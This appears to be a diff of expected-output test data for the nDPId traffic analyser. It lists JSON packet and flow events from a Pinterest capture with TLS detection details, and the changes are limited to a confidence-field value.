00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="} 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -171,67 +171,67 @@ 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 